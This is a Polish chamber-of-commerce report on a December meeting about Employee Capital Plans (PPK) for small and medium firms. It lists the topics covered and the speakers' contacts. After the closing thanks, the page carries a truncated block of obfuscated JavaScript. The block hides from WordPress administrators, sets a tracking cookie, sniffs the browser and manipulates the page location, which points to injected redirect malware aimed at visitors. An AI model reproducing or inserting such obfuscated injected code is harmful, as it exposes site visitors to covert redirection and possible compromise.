Pracownicze Plany Kapitałowe – relacja ze spotkania dla MŚP | Północna Izba Gospodarcza w Koszalinie

Dnia 4 grudnia br w Restauracji Młyńskiej odbyło się spotkanie informacyjne dla małych i średnich przedsiębiorstwach dotyczące Pracowniczych Planów Kapitałowych.

W czasie spotkania Pan Krzysztof Słomiński z Polskiego Funduszu Rozwojowego oraz Pan Przemysław Gawlak z Esalians TFI omówili poniższe zagadnienia:

  • O PPK: dlaczego, kiedy, po co, kto na tym zyska? Schemat wdrożenia, daty ustawowe, pułapki.
  • Na co zwrócić uwagę przy wyborze zarządzającego: Warunki umowy i obowiązki pracodawcy. Umowa o zarządzanie i prowadzenie. Kluczowe decyzję na start oraz możliwość zmiany zarządzającego w czasie.
  • Poznasz najlepsze praktyki i politykę PPK w firmie: Jak powinny wyglądać wewnętrzne regulaminy, proces obsługi u Pracodawcy, zakres czynności, zmiany w regulaminach pracy, Polityka informacyjna o PPK w stosunku do pracowników. Jakie zostały przygotowane sankcje prawne oraz prawienia min. PIP w tym zakresie.
  • Jakie obowiązki informacyjne i dokumentacyjne ciążą na firmie: Otrzymasz odpowiedzi na nurtujące pytania.
  • Jak naliczać wpłaty do PPK: Za kogo? Terminy. Zmiany składki. Zwolnienia. Obowiązki pracodawcy i sankcje.
  • Jak rozwiązać problemy związane z systemami finansowo płacowymi. Omówimy system raportowania do organu nadzoru, instytucji finansowej, pracowników, jak powinny wyglądać wzory dokumentów do stosowania w firmie. Jak utworzyć całą dokumentacje PPK.
  • Jak prawidłowo opodatkować składki PPK oraz jak uwzględnić składkę w kosztach uzyskania przychodów. Omówimy podatek od zysków kapitałowych oraz podatek od spadków i darowizn.
  • Jak wypełnić obowiązki związanie z zatrudnieniem nowego pracownika. Gotowe formularze i pomoce we wdrożeniu.
  • Jak ustrzec się sankcji karnych i naliczenia kar za błędy we wdrożeniu PPK.
  • Jak bezpłatnie i szybko skorzystać z pomocy ekspertów.

Prezentacja Polskiej Fundacji Przedsiębiorczości do pobrania: PFRPORTAL – PPK prezentacja z aktualizacjami

Kontakt do prelegentów:

Krzysztof Słomiński
Trener
Polski Fundusz Rozwojowy
krzysztof.slominski@pfrportal.pl
www.mojeppk.pl

Przemysław Gawlak
Dyrektor Biura Sprzedaży i Rozwoju Planów Emerytalnych

ESALIENS TFI SA
PGawlak@esaliens.pl
tel. +48 22 337 66 69
mobile. +48 607 155 900
Youtube: PPK Esaliens TFI

Polecane artykuły: https://subiektywnieofinansach.pl/ppk-w-malej-i-sredniej-firmie-wdrazanie-api/

Serdecznie dziękujemy za uczestnictwo!

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m